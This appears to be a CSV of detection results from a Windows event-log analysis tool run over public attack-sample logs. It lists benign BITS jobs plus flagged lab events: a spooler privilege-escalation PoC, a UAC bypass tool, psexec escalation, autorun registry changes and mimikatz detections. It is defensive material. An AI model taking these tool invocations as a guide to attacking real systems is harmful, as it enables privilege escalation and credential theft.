2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe payload.dll : Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe : User: 3B\lgreen : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe : Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0) : Path: C:\Windows\System32\taskhostw.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe : Path: C:\Users\Public\psexecprivesc.exe : User: MSEDGEWIN10\user02 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 : Path: C:\Windows\System32\mspaint.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
